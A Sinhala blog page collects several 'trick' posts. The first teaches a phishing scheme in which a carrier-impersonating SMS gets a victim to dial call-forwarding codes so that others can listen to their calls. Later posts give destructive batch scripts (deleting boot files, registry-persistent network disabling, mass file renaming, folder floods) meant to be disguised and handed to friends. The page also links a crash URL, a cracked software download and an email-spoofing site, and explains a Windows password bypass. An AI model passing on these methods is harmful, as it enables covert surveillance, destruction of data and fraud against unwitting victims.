Showing posts with label triks. Show all posts
Showing posts with label triks. Show all posts
දන්නා නොදන්නා ඕනෑම අයෙකුගේ ජංගම දුරකතන අංකය ආශ්‍රයෙන් ඒ ඒ පුද්ගලයින්ගේ දුරකතන ඇමතුම් වලට සවන් දියහැකි ක්‍රමවේදයකි.

ආයුබෝවන් යාලුවෝ හැමදෙනාටම කලබල නැතුව මුල ඉඳලා අගට යනකන්ම මේක කියවලාම වැඩේට බහින්න. ඉතින් මම මේ ඔයාලට කියලා දෙන්න යන්නෙ කොහොමද කෙනෙක්ගෙ දුරකතන අංකය භාවිතා කරලා ඒ කෙනාගෙ දුරකතන ඇමතුම් වලට සවන් දෙන්නෙ කියලා. මම මේ දේ කියල දෙන්න යන්නෙ කාටවත් නරකක් කරන්න නෙවෙයි.තමන් ආදරය කරන කෙනා තව කෙනෙක් එක්ක Phone එකෙන් කතා කරනවද කියලා සැකනම්, තමන්ගෙ දුව-පුතා කවුරු එක්කද Phone එකෙන් කතා කරන්නෙ කියලා දැනගන්න ඕනිනම් ඒ දේවල් දැනගන්න.ඒක නිසා මේ දේ කවුරුවත් වැරදි විදියට පාවිච්චි කරන එකක් නැහැ කියල මම බලාපොරොත්තු වෙනවා. මම මේ දේවල් පිලිබඳ කිසිඳු වගකීමක් බාරනොගන්නා බවද කියන්න කැමතියි.


---අපි වැඩේ පටන්ගමු.---

හැඳින්වීම :

ඕනෑම කෙනෙකුට මෙය අත්හදා බැලිය හැක.එනම් පහසු ක්‍රියාවලියකි.
SMS පහසුකම සහිත ඕනෑම දුරකතනයක් මෙම ක්‍රමයෙන් Hack කිරීමට පුලුවන්.(සමහර ලංකාබෙල්, සිටිලින්ක් දුරකතන හැර...)
(Phishing හා සමාන ක්‍රමවේදයකි.)

අවශ්‍යය දේවල් :
අලුත්ම Gmail Account එකක්
(උදා :- dialoglanka@gmail.com , srilankamobitel@gmail.com වගේ එකක්.ඒක ඔයාලා Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලය අනුව,ඊට උචිත නමකින් හදාගන්න..)
අලුත්ම සිම් කාඩ් පතක්(සිම් එක ගන්න ඕනෙ Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලයේ සිම් එකක්මයි)
ඔක්කොම දේවල් දැන් අපි ලෑස්ති කරගෙන තමයි තියෙන්නෙ.
මම දැන් පියවරෙන් පියවර කියල දෙන්නම්.
ඉස්සෙල්ලම ඔයා හදපු Gmail Account එකට Log වෙන්න.
ඊට පස්සෙ ඔයා Hack කරන්න යන කෙනාගෙ Phone Number එක Contact List එකට දාගන්න.
දැන් ඒ කෙනාට SMS යවන Window එක Open කරගෙන මේ පහලින් පෙන්නලා තියන විදියට මොනව හරි Type කරගන්න

උදා :-
Dialog.adata niyamitha
apage sanwathsarika
semarum hethuwen
"30mins" kaalayak onema jalayakata
amathum nomile labadheemata
api katayuthu yodha athi bawa
sathutin danwamu.me sandaha
pahatha keathaya amathaa liyaapadinchi wanna
"*******************"
____________________
දැන් මම ඔය තරු ටිකක් දාල තියන තැන Type කරන්න තියනවා අංකයක්.පහල තියන අංක 4න් ඕනෑම අංකයක් එතනට දාන්න පුලුවන්.එතකොට වෙන දේවල් ටිකත් මම ඒ එක්කම දාල ඇති.ඒක බලපුවහම කට්ටියට තේරෙයි මොකද වෙල තියෙන්නෙ කියලා.
මම "X" දාලා තියන තැන් වලට ඔයාලා අරගත්ත සිම් එකේ Number එක ලියන්න.

**62*XXXXXXXXXX#
මේ අංකය දැම්මොත් ඒ කෙනා Phone එක OFF කරපුවහමයි, Signal නැති වෙලාවටයි එයාගෙ Phone එකට එන සේරම calls එන්නෙ ඔයා අර දාපු Number එකට.
**61*XXXXXXXXXX#
මේ අංකය දැම්මොත් ඒ කෙනා Phone එක Answer කරන්නෙ නැති වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට.
**67*XXXXXXXXXX#
මේ අංකය දැම්මොත් ඒ කෙනා Call එකක ඉන්න වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට.
**21*XXXXXXXXXX#
මේක දැම්මොත් ඒ කෙනාට එන සේරම Calls එන්නෙ ඔයා අර දාපු Number එකට.
හැබැයි මේකනම් එච්චර සාර්ථක නැහැ.පටස් ගාලා අහුවෙන්න පුලුවන්.ඔයාලටම තෙරෙයි ඒ ඇයි කියලා.
Number එක මෙන්න මේ විදියට දාන්න මතක තියා ගන්න.වෙන වෙන විදියට ගහන්න එපා.
උදා :-

"0712345678"
දැන් මේ SMS එක ඒ කෙනාට යවන්න.ඒ කෙනා මේ Code Number එක Dial කරපු සැනින් ඔයා යවපු Code Number එකේ හැටියට සේරම Calls හැරෙනවා.මේක හැම Phone එකකටම වෙනසක් නැතුව වැඩ කරනවා.ඕනෙම Phone එකකට.

කියන්න අමතක උනා මෙවා අයින් කරගන්න යට Code එක ගහන්න
##002#
මේක සාමාන්‍යය Phone එකකිනුත් කරන්න පුලුවන්.ඒත් එහෙම සාමාන්‍යය Number එකකින් SMS එකක් ආවට ඒක කවුරුවත් ගනන් ගන්නෙ නැහැ.ඒක නිසයි අපි Gmail Use කලේ.එතකොට SMS එක යන්නෙ "12323" වගෙ අංක 5ක Number එකකින්.ඒ වගෙම අපි අලුතින් Gmail Account එකක් හැදුවෙ අපේ Gmail Address එකත් SMS එකේ යටින් වැටෙන නිසා.
එහෙනම් යාලුවෝ හැමෝම මේක Try කරල බලන්න.
කාටවත් නරකක් කරන්න නෙවෙයි.යමක් ඉගෙනගන්න.

.... උපුටා ගැණීමකි....
                                                         

                                   මේකේන් අපිට පුලුවන් 1GB OR 2GB එක 4GB කරන්න.කථා නෑතුව අපි කෙලින්ම වෑඩේට බහිමු.මමත් මේක හොය ගත්තේ වෙන රටක කෙනෙක් කරන Blog අඩවියකින්.
මුලින්ම අවශ්‍ය දේවල්,


                               1.1GB/2GB මෙමරි චිප් එකක් හරි පෙන් එකක්.

                               2. Driver Increaser Tool බාගන්න.

                               3.දෑන් ඒ බාගත්තු එක unzip කරන්න.

                               5.දෑන් ඒකේ ඈති "Drive Increaser 2.bat" කියලා Bat file එකක් එක Open කරන්න.

                               6.දෑන් පෙන් එක හරි මෙමරිය හරි Computer එකට connect කරන්න.



               (අවශ්‍ය දේවල් pen එකේ හරි මෙමරියේ හරි තියනවනම් එකේ Backup එකක් ගහගන්න.)



                                    

7.දෑන් My Computer එකට යන්න.එකේ ඔයගෙ මෙමරිය හරි පෙන් එක හරි තියන තෑන වරහන් ඈතුලේ තියන අකුර EG:-(F:)පල්ලෙහා තිය අකාරයට B එකෙන් පෙනන එක.මතක තිය ගන්න.එක තමා ඔයගේ පෙන් හරි මෙමරිය පරිගනකය විසින් හදුනා ගන්න සන්කේතය.

8.දෑන් අර Open කරපු .bat file එකට යන්න.එකේ එක සෑරයක් Enter එක ඔබන්න.දෑන් ඔයගේ පෙන් එකේ English අකුර දීලා Enter කරන්න.නෑවතත් ඒ ආකාරයටම English අකුර ලබාදී Enter කරන්න.දෙන් වෑඩේ ඉවරයි.දෑන් My computer එකට ගිහින් බලන්න මොකද වෙලා තියෙන්නේ කියලා .එහේනම් අයේ මේ වගේ Post එකකින් හම්බෙමු.Comment එකකුත් දාන්න අමතක කරන්න එපා.

අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.
1. URL එකකින් සිස්ටම් එක Crash කරමු.

                                            මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN

2. පරිගණකයක් සදහටම නිදි කරවමු

                             මේකෙත් පොඩි ගේමක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- NFS.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top

No Internet.....

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

යළුවගෙ Internet නැත්තටම නැතිකරන්න.....මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .bat කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න....

Change File Type.....

@echo off

ren *.exe *.txt

ren *.jpeg *.txt

ren *.mp3 *.txt

ren *.doc *.com

ren *.jpg *.txt

යළුවගෙ Files නැත්තටම නැතිකරන්න.....මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .bat කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න....

Crazy Text Maker.....

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200

Wshshell.Sendkeys “s”

Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”

WScript.Sleep 200

WshShell.SendKeys “You”

WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”

wscript.sleep 200

wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop

මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .VBS කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න..

Folderssssssssssssssss.....

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################

එපා වෙනකන් Folders හදන්න...මේ Code එක Copy කරල Notepad එකේ .txt වෙනුවට .VBS කියල Save කරන්න (name.bat)........
Administrator විදියට open කරන්න..
 
ටොරන්ට්ස් කිව්වම නොදන්න කෙනෙක් නෑ.ඒත් අඩුම කලෙකින් වැඩිම ඩවුන්ලෝඩ් ස්පීඩ් එකකින් ලේසියෙන් ටොරන්ට් එකක් බාගන්නෙ කොහොමද කියන එක තවමත් ගොඩාක් දෙනෙක් හරියට දන්නෙ නෑ.ඉතින් නොදන්න අයගේ දැනගැනීමටයි දන්න අයගේ දැනුම අලුත් වෙන්නයි මේ ලිපිය වැදගත් වෙයි කියලා හිතෙනවා.

අපිට ටොරන්ට් එකක් Download වෙන්න දැම්මට පස්සෙ අපේ අන්තර්ජාල සම්බන්ධතාවයෙන් අපිට කැමති වේගයක් ඒ සඳහා වෙන් කරන්න පුලුවන්..

හැමතිස්සෙම මතක තියාගන්න අපේ ඩවුන්ලෝඩ් ස්පීඩ් එක කොච්චර අඩු උනත් අපේ අප්ලෝඩ් limit එක 3KB/s වගේ අගයකවත් තියාගන්න.. මොකද ඒ අය අපේ Statistics වෙනම තියාගන්නවා...
අපි කොච්චර ඩවුන්ලෝඩ් කරගත්තද, කොච්චර අප්ලෝඩ් කලාද, ඒ වගේ දේවල්..
මෙන්න මෙහෙමයි අප්ලෝඩ් ස්පීඩ් එක වෙනස් කරන්නේ...
ඉක්මනට බාගන ඕනෙම නම් ඉතින් අප්ලෝඩ් ස්පීඩ් එක 1KB/s දැම්මත් කමක් නෑ.. 
ඒ වගේම Ratio එක, ඒ කියන්නෙ ඔයා මේක ඩවුන්ලෝඩ් කරා වගේම කොච්චර අනිත් අය වෙනුවෙන් අප්ලෝඩ් කරලද කියන එකත් වැදගත්.. ඒ කියන්නෙ ඩවුන්ලෝඩ් කරපු ප්‍රමාණයයි අප්ලෝඩ් කරපු ප්‍රමාණයයි අතර අනුපාතය..ඒක නිසා ඔයගොල්ලෝ කොච්චර ඩවුන්ලෝඩ් කරගෙන ඒකට සාපේක්ෂව අප්ලෝඩ් කරලද කියලා බලලා තමයි ඔයාලාගේ ඊලඟ ටොරන්ට් එක බානකොට ඔයාට ප්‍රමුඛතාව ලැබෙන්නෙ..

තේරෙන්නෙ නැත්නම් මෙහෙම හිතමුකො.. ඔයා මොකක් හරි ඩවුන්ලෝඩ් කරගත්තයි කියලා හිතාගන්නකෝ..
ඒක 1ක් ලෙස සලකලා ඔයා ඒකට අදාලව අප්ලෝඩ් කරලා තියන ගාන කොච්චරද කියලයි Ratio කියන එකෙන් පෙන්නන්නෙ.. ඔයා 1GB මොකක් හරි බෑවානම් Ratio එක 0.1 කියලා වැටිලා තියන්වනම් එතනින් කියන්නෙ ඔයා අනිත් අය වෙනුවෙන් 100MB අප්ලෝඩ් කරලා කියන එකයි..
ඉතින් වඩා හොඳ වේගයකින් ටොරන්ට් එකක් බාගන්න ඕනේ නම් Ratio එක 0.5 කියන අගයෙවත් තියාගන්න උත‍්සාහ කරන්න.. ඒ කිව්වෙ බාගත්තු දේවල් වලින් 50%ක්වත් අප්ලෝඩ් කරන්න වගබලා ගන්න... :)

ඔය පොඩි පොඩි Softwares එහෙම බානවනම් ඒ කිව්වෙ MB දෙකේ තුනේ ඒවා බානවනම් ඒකෙන් උපරිම ප්‍රයෝජන ගන්න ඒක සාමාන්‍යයෙන් වැඩ කරනවා අඩු වෙලාවලදි අප්ලෝඩ් වෙන්න දෙන්න 5KB/s - 10KB/s විතර අප්ලෝඩ් ස්පීඩ් ලිමිට් එකකින්.. මේ වගේ දේවල් වලින් පුලුවන් ලේඩියෙන්ම Ratio එක 20කටත් වඩා වැඩි කරගන්න...

ඒ නිසා අප්ලෝඩ් ස්පීඩ් එක අඩුවෙන් දාපු අය පස්සෙ වෙලාවක හරි අනිත් අය ගැන හිතලා අප්ලෝඩ් ස්පීඩ් එක වැඩි කරනවනම් හොඳා.

ඒ වගේම මේ ඔක්කොම කරලත් ටොරන්ට් එකක් ඩවුන්ලෝඩ් වෙන වේගය අඩු නම් ඒක Seeders ලා මදි කම නිසා වෙන්න පුලුවන්.. සීඩර්ස්ලා කියන්නෙ අපි download කරන දේ සම්පූර්ණයෙන්ම download කරලා ඉවර වෙලා අපි වෙනුවෙන් upload කරන්න සූදානමින් ඉන්න අය..
peers ලා කියන්නේ තවමත් ටොරන්ට් එක සම්පූර්නයෙන්ම බාලා ඉවර වෙලා නැති අය...ඕනම peer කෙනෙක් ටොරන්ට් එක සම්පූර්ණයෙන්ම බාලා ඉවර උන ගමන් එයා seeder කෙනෙක් වෙනවා.. එතකොට එයාට පුලුවන් අර ටොරන්ට් එකේ ඕනම කොටසක් ඉල්ලන peer කෙනෙක් වෙත යවන්න... නමුත් මෙතනදි තේරුම් ගන්න ඕන දේ තමයි peer කෙනෙක් තවමත් ටොරන්ට් එක සම්පූර්ණයෙන්ම බාලා ඉවර නැති නිසා එයාට දෙන්න පුලුවන් තමන් මෙච්චර දුරට download කරගෙන තියන ප්‍රමාණයේ අඩංගු කොටසක් හෙවත් block එකක් විතරයි..


ඉතින් ඔයා බාන්න දාපු ටොරන්ට් එකේ සීඩර්ස්ලා අඩුයි නම් වෙන වෙන තැන් වල ඉන්න සීඩර්ස්ලාගේ සහාය ලබාගන්න මේ ට්‍රැකර්ස් ලිස්ට් එකෙන් පුලුවන්... මුලින්ම මේ Trackers ලිස්ට් එක බාගන්න.
http://www.mediafire.com/view/xsetlnfzze5501g/trackers_%28webmycomputer.blogspot.com%29.txt
ඊටපස්සෙ කරන්න තියෙන්නෙ ඒ නෝට් පෑඩ් එකේ තියන ට්‍රැකර්ස් ලිස්ට් එක කොපි කරගන්න එක...
ඊලඟට Torrent Application එකට ගිහින් බාන ටොරන්ට් එක උඩ Right Click කරලා Properties යන්න..
ඊලාඟට එන window එකේ General tab එකේ Trackers කියන text box එකේ පහළ පින්තූරෙ තියන විදිහට අර කොපි කරගත්ත trackersලගේ ලිස්ට් එක Paste කරලා OK කරන්න....
ඊටපස්සෙ යටින් තියන Trackers කියන Tab එක ක්ලික් කලාම ඔයාලටම බලගන්න පුලුවන් Trackers ලිස්ට් එක අප්ඩේට් වෙන හැටි..ඒකෙන් එක එක තැන් වල ඉන්න seedersලට ඔයා බාන ටොරන්ට් එකට seed කරන්න පුලුවන් වෙන්න සම්බන්ධ කරනවා...
ඉතින් මේක කියවලා ඉවර උනාම ඔයාලට සීඩර්ස්ලා වැඩි ටොරන්ට් එකක ගුණාත්මක භාවය ගැන අදහසක් ගන්න පුලුවන්... ඒක නිසා ටොරන්ට් ෆයිල් එකක් උනත් හොයනකොට seeds වැඩි ටොරන්ට් එකක් වගේම ඒ ටොරන්ට් එකට ඒක කලින් බාපු අය දාලා තියන කමෙන්ට්ස් ගැනත් අවධානය යොමු කරන්න...
peers ලා 10,000 ක් හිටියත් වැඩක් නෑ ඒ ටොරන්ට් එකට එක seeder කෙනෙක්වත් නැත්නම් ඔයාට කවදාවත් ඒ ටොරන්ට් එක සම්පූර්ණයෙන්ම බාලා ඉවර කරන්න බෑ.ඔන්න ඕකයි ටොරන්ට්ස් ලෝකයේ සීඩර් කෙනෙක්ට තියන වටිනාකම. 
ඒ වගේම අපිට සොෆ්ට්වෙයාස් පාවිච්චි කරලා උනත් පුලුවන් අපේ ඩවුන්ලෝඩ් ස්පීඩ් එක වැඩි කරගන්න...
කෝකටත් මම ඒ වගේ එකක් දාන්නම්කෝ..  මේ තියෙන්නේ ඒ වගේ සොෆ්ට්වෙයා එකක්.


මේක BitTorrent වලට විතරක් නෙමෙයි වෙන Torrent මෘදුකාංග වලටත් අදාලයි...
මේකෙන් වෙන්නෙ මුලු අන්තර්ජාල සම්බන්ධතාවයටම ත්වරණයක් ලබාදෙන එක..

 
ඇත්තටම මේකෙන් වෙන්නේ අපේ තියෙන WIFI PC එක අපිට පුළුවන් WIFI HOTSPOT එකක් කරන්න පුළුවන් .අපේ තියෙන ඉන්ටර්නෙට් කනෙක්ෂන් එක වයි ෆයි වලින් ෂෙයාර් කරගන්න පුළුවන්…Wifi Router එකක් වගේ . මේ වගේ Wifi තියෙන Mobile Phone කීපයක් උනත් මේ නෙට්වරක් එකට සම්බන්ද කරන්නත් පුළුවන් ඔයාලට.
මේ සොෆ්ට්වෙයා එකේ සංස්කරණ දෙකක් තියෙනවා…Lite හා Pro විදියට,Lite වෂන් එක ෆ්‍රී පාවිච්චියට දෙන එකක්…නමුත් එකේ Features ගොඩක් අඩුයි.Pro සංස්කරණයදී Internet Connection එක share කරනව වගේම තව ගොඩක් වටිනා Features එකතු වෙලා තියෙනවා.
මේකේ තියෙන විශේෂයන් බලන්න ඕනේ නම් මෙතන CLICK කරන්න ඔයාලා . මේකේ තියෙන PRO එක ඔයාලා ගන්නවානම් එක 29.99$ ක් වෙනවා යාලුවනේ . එත් අද මම ඔයාලට දෙනවා PRO එක ,එහෙනම් පහලින් DOWNLOAD කරගන්න ඔයාලා යාලුවනේ ................

DOWNLOAD SOFTWARE (ALL FILES ) :
http://onhax.net/connectify-9-crack/

එකෙන්ම මේක ඇවිල්ල Windows වල Password එක Reset කරන විදිහ..... කිරිකජු වගේ..... ඕනෙම එක්කෙනෙක්ට මේක කරන්න පුළුවන්.... හරිම ලේසියි ...............



පම්පෝරි නැතුව වැඩේට බහිමුකො...
හරි දැන් හිතන්නකෝ මොකක් හරි Password එකක් දාල Windows එක Lock උනා කියල..... දැන්කොහොමද එක අරින්නේ.... ??????

දැන් CMD එක ඔපෙන් කරගන්නකො.. ආ................ මට වැරදුනා.. Account එකට ලොග් වෙන්න බැනේ.....
හරි Computer එක Restart කරන්නකෝ..... on වෙනකොට... F8 ගහන්න.... ගැහුවම එනවනේ Advance Boot Options හරිය....
Safe Mode With Command Prompt එක Select කරලා එන්ටෙර් කරන්නකෝ.....

දැන් ඔයාගේ Com. එක Open වෙනවා CMD එකෙන්//////
{හැබැයි ඔයාගේ Account එකේ Name එක මතක තබාගන්න }
ඊටපස්සේ CMD එකේ net user Raveen 12345 ගහලා එන්ටෙර් කරන්න....
හරිය..
{Raveen මේ ටිකට ඔයාගේ Account එකේ Name එක දෙන්න..}

දැන් වැඩේ හරි.... මෙහෙම වැටුනනේ..... බිමට නෙමේ.... CMD එකේ...
The Command Completed Successfully. කියල වැටුනනේ.....

දැන් Com එක Restart කරන්න.... දැන් වැඩේ හරි.... ආ.............. තව පොඩි දෙයක්....
ඔකේ.12345 කියන්නේ ඔයාගේ දැන් Password එක .... දැන් එකෙන් ලොග් වෙලා ඕනේ Password එකක් Account එකට දාගන්න.....

එහෙනම් වැඩේ හරිනේ/.....

මේකේ එක පාරම Password එක දෙන්න පුළුවන්..... අර මන් 12345 කියන තැනට ඕනේ පස්ස්වොර්ඩ් එක දෙන්න එකෙන්ම........ එතකොට එකෙන්ම Password එක හරි....
දැන් වැඩේ හරිනේ........



මෙන්න පොඩි fun එකක් ගන්න පුළුවන් site එකක් තියෙනවා......
මම මේ highlight කරලා තියෙන තැනට යවන්න ඕනේ කෙනාගේ email දාන්න අනිත් ඒවා ඔයාලට කැමැති විදිහට fill කරන්න කරන්න.....


https://emkei.cz/